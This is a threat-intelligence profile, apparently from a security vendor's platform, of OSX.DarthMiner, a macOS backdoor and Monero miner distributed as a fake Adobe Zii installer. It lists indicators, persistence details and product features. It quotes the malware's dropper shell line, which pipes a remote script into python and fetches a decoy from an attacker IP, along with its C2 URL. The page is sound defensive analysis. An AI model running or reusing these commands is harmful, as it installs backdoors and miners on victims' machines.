OSX.DarthMiner is macOS malware distributed as a fake Adobe Zii application, a trojanized piracy tool for Adobe software. It combines the open-source EmPyre backdoor with the XMRig cryptominer, giving operators both arbitrary remote command execution and persistent cryptocurrency mining on infected Macs. The fake installer used an Automator applet that executed a shell script, downloaded an obfuscated Python payload from https://ptpb.pw/jj9a, and retrieved a decoy sample.app from 46.226.108.171:80 to appear legitimate. The Python payload checked for Little Snitch and exited if it was present, then connected to an EmPyre backend at http://46.226.108.171:4444/news.php using the cookie session=SYDFioywtcFbUR5U3EST96SbqVk=. A follow-on command downloaded and executed /private/tmp/uploadminer.sh, which installed persistence via LaunchAgents, including com.proxy.initialize.plist for the backdoor and com.apple.rig.plist for the miner. It also downloaded xmrig and config.json into /Users/Shared, made the miner executable, and launched it. Commented-out code in the script referenced proxy configuration at 46.226.108.171:8080 and installation of a mitmproxy root certificate, which would have enabled interception of web traffic if activated. Observed behavior centered on persistent Monero mining, but the EmPyre backdoor meant the attackers could also execute additional commands, potentially including file theft or credential capture. Malwarebytes for Mac detects this threat as OSX.DarthMiner. A reported sample hash for Adobe Zii.app.zip is ebecdeac53069c9db1207b2e0d1110a73bc289e31b0d3261d903163ca4b1e31e.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
10 distinct techniques documented for this family, organized by ATT&CK tactic.
Opening the fake Adobe Zii app with Automator reveals the nature of the software, as it simply runs a shell script: curl https://ptpb.pw/jj9a | python - & s=46.226.108.171:80; curl $s/sample.zip -o sample.zip; unzip sample.zip -d sample; cd sample; cd __MACOSX; open -a sample.app
What about the Python script? That turned out to be obfuscated, but was easily deobfuscated...
The malware was being distributed through an application named Adobe Zii... the app was called Adobe Zii, but it was definitely not the real thing... The sample.app is simple. It appears to simply be a version of Adobe Zii, most likely for the purpose of making it appear that the malware was actually “legitimate.”
This script opens up a connection to an EmPyre backend... server='http://46.226.108.171:4444'; t='/news.php'
11 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
2 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Backdoor that installs the EmPyre RAT and XMRig cryptominer, allowing remote command execution and Monero mining.
A Mac malware sample distributed as a fake Adobe Zii application that combines the EmPyre backdoor and XMRig cryptominer, establishes persistence, and may have enabled arbitrary command execution beyond mining.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.